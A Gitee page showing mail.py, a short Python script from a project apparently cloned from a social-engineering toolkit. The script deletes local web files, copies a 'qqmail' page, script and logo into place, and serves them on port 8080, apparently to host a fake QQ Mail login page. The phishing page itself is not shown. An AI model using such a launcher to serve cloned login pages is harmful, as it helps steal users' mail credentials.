加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
文件
克隆/下载
mail.py 787 Bytes
一键复制 编辑 原始数据 按行查看 历史
LinWin-Cloud 提交于 2022-03-26 08:53 . SetoolLinux
print("")
print("finish the file mail.py...")
print("finish the file setoollin.py...")
print("finish the file index.html")
print("")
#=================================#
#=================================#
import os
os.system("rm -f index.html")
os.system("rm -f index./js")
os.system("rm -f location.js")
#del the file
os.system("cp qqmail/index.html ./")
os.system("cp qqmail/index.js ./")
os.system("cp qqmail/logo.jpeg ./")
#==================================#
#==================================#
#==================================#
with open("date.txt","a") as f:
f.write("start the port 8080")
f.write("start the mail.py")
import os
print("start the port 8080 on http://127.0.0.1 and http://localhost:8080")
os.system("python3 -m http.server 8080")
马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化